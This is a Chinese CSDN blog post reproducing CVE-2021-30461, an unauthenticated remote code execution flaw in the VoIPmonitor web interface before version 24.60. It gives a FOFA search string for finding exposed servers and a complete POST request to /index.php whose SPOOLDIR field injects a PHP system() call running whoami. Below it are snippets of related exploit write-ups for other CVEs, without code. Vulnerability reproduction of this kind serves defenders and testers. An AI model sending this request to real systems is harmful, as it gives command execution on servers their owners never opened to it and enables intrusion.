VoIPmonitor 远程命令执行漏洞( CVE-2021-30461)

最新推荐文章于 2024-04-25 09:15:00 发布
最新推荐文章于 2024-04-25 09:15:00 发布
阅读量799 收藏
点赞数
文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44146996/article/details/116534946
版权

漏洞描述

VoIPmonitor是“具有在Linux上运行的SIP RTP和RTCP VoIP协议的具有商业前端的开源网络数据包嗅探器”。

使用通过Web界面到达的用户提供的数据,允许未经身份验证的远程用户触发VoIPmonitor中的远程PHP代码执行漏洞。

漏洞影响

VoIPmonitor < 24.60

fofa搜索语法

FOFA: “VoIPmonitor”

漏洞复现

登录页面
在这里插入图片描述

发送post请求包

POST /index.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 49

SPOOLDIR=test%22.system%28whoami%29.%22&recheck=annen

在这里插入图片描述
在这里插入图片描述

MD@@nr丫卡uer
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VoIP monitor:VoIP SIP和SKINNY质量分析仪以及数据包/音频记录工具-开源
05-14
VoIPmonitor是开放源网络数据包嗅探器,具有在Linux上运行的SIP SKINNY MGCP RTP和RTCP VoIP协议的商业前端。 VoIPmonitor旨在根据ITU-T G.107 E模型根据网络参数分析VoIP呼叫的质量-延迟变化和数据包丢失,该模型可预测MOS规模的质量。 具有所有相关统计信息的调用将保存到MySQL或ODBC数据库中。 可以选择仅使用SIP / SKINNY协议或SIP / RTP / RTCP / T.38 / udptl协议将每个呼叫保存到pcap文件。 VoIPmonitor也可以解码音频。
VoIPmonitor 远程命令执行( CVE-2021-30461)
thelostworld
05-10 969
VoIPmonitor 远程命令执行( CVE-2021-30461) 一、漏洞描述 VoIPmonitor Web界面用,允许未经身份验证的远程用户触发VoIPmonitor中的远程PHP代码执行漏洞。 二、影响版本 VoIPmonitor < 24.60 三、漏洞复现 访问地址页面: POC: POST /index.php HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x...
海康摄像头CVE-2021-36260漏洞复现
最新发布
A_991128a的博客
04-25 1415
攻击者利用该漏洞可以用无限制的 root shell 来完全控制设备,即使设备的所有者受限于有限的受保护 shell(psh)。除了入侵 IP摄像头外,还可以访问和攻击内部网络。该漏洞的利用并不需要用户交互,攻击者只需要访问 http 或 HTTPS服务器端口(80/443)即可利用该漏洞,无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息。
CVE-2021-30461 - VoIPMonitor未授权远程代码执行漏洞
DUANYU23的博客
05-11 1480
VoIPMonitor未授权远程代码执行漏洞0X001前言0X002 漏洞影响0X003 漏洞原理0X004 漏洞复现0X041 空间搜索寻找目标0X042 测试代码执行 0X001前言 VoIPmonitor是“具有在Linux上运行的SIP RTP和RTCP VoIP协议的具有商业前端的开源网络数据包嗅探器”。 使用通过Web界面到达的用户提供的数据,允许未经身份验证的远程用户触发VoIPmonitor中的远程PHP代码执行漏洞。 0X002 漏洞影响 恶意攻击者可以执行任意系统命令。 0X003 漏洞
VULNHUB靶机渗透——DC-6(Activity monitor远程命令执行漏洞利用)
aarong的博客
12-28 3289
靶机来源:https://www.vulnhub.com/entry/dc-6,315/ 1.扫描(arp-scan和nmap) 可以看到靶机开放了两个端口分别是22和80 2.打开浏览器浏览靶机网页 发现打不开这个网站,分析原因发现URL上并没有显示刚刚输入的靶机IP,而是变成了wordy,那么有可能是本地hosts文件没有解析到这个IP。 所以打开hosts文件绑定靶机IP: 路径为/etc/hosts 修改为: 靶机IP wordy 再次打开浏览器访问就可以访问成功了: 发现这个网页使用的是非
vulnhub之Monitoring(完整复现过程)
鲨鱼辣椒的博客
06-15 683
目录 信息搜集 扫描网段 扫描端口 扫描网站目录 查看网页 找到漏洞 看到登录页面尝试爆破 爆破出密码,尝试登录后台 getshell 后台行不通,还是回到搭建平台上 找到一个版本对应的脚本 getshell失败,扩大搜索范围。尝试多个脚本 找到正确脚本,设置选项 getshell 顺利拿到flag 信息搜集 扫描网段 扫描端口 nmap -A -P- 192.168.179.140 扫描网站目录 mul 目录没有扫出什么有价值的东西。 查看网页.
apache stucts 2远程命令执行漏洞 (CVE-2021-31805) poc检测工具
04-21
检测一个url命令为 python3 CVE-2022-22954-POC.py -u http://test.com 检测多个url命令为 python3 CVE-2022-22954-POC.py -f file.txt(把url按一行一个保存到file.txt中) 结果有可能如下
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Java 6 将 log4j 升级到 2.3.2 版本,Java 7 将 log4j 升级到 2.12.4 版本,Java 8 或更高版本将 log4j 升级到 2.17.1 版本
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
OpenSSH 资源管理错误漏洞(CVE-2021-28041)
06-22
OpenSSH 资源管理错误漏洞(CVE-2021-28041) OpenSSH 是一个开源的 SSH 服务器实现,广泛应用于 Linux、Unix 和 Windows 等操作系统中。然而,OpenSSH 也存在一些安全漏洞,其中之一就是资源管理错误漏洞(CVE-2021-...
voipmonitor安装使用说明
12-14
VoIPmonitor是开源网络数据包嗅探器,用于在Linux上运行的SIP RTP RTCP和SKINNY(SCCP)MGCP VoIP协议数据。VoIPmonitor旨在根据网络参数,延迟变化和数据包丢失来分析VoIP呼叫的质量。具有所有相关统计信息的调用将保存到MySQL数据库。可选的,也可以使用SIP协议或SIP / RTP / RTCP / T.38 / udptl协议将每个呼叫保存到pcap文件。VoIPmonitor还可以解码语音并将其作为WAV保存到磁盘。支持的编解码器是G.711 alaw / ulaw
CVE-2019-0708-POC.py
05-27
网上搜集的poc,不知道是哪些版本Windows的能测出来。
Linux /etc/voipmonitor.conf 例子
wtaochange的博客
06-13 132
voipmonitor 配置文件
VoIP服务器曝重大漏洞,黑客可以绕过管理员身份
w3cschools的博客
11-05 443
PBX是专用小交换机的缩写,是一种交换系统,用于建立和控制电信端点之间的电话呼叫,例如常规电话机,公用电话交换网(PSTN)上的目的地以及基于Internet协议的语音的设备或服务(VoIP)网络。 据东方联盟安全组织的研究发现,该攻击利用了CVE-2019-19006(CVSS评分9.8)这一严重漏洞,影响了FreePBX和PBXact的管理员Web界面,潜在地允许未经授权的用户通过将特制数据包发送到系统来获得管理员对系统的访问权限。 远程管理员身份验证绕过漏洞影响FreePBX版本15.0.16
[网络安全-1]Redis远程攻击漏洞分析与防护
shgh_2004的专栏
05-31 826
Redis远程攻击漏洞分析与防护 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥...
海康威视摄像头命令注入 CVE-2021-36260
qq_14902381的博客
05-23 1635
海康威视命令注入 CVE-2021-36260。
CVE-2021-3156(sudo Heap overflow sudo本地提权复现与分析)
「鸿渐之翼」的博客
02-04 4396
CVE-2021-3156简介:
elasticsearch Apache Log4j 远程代码执行漏洞(CVE-2021-44228、CVE-2021-45046)
03-07
elasticsearch和Apache Log4j都存在远程代码执行漏洞(CVE-2021-44228、CVE-2021-45046),攻击者可以利用这些漏洞在受影响的系统上执行任意代码。建议用户尽快更新相关软件版本或采取其他安全措施来保护系统安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值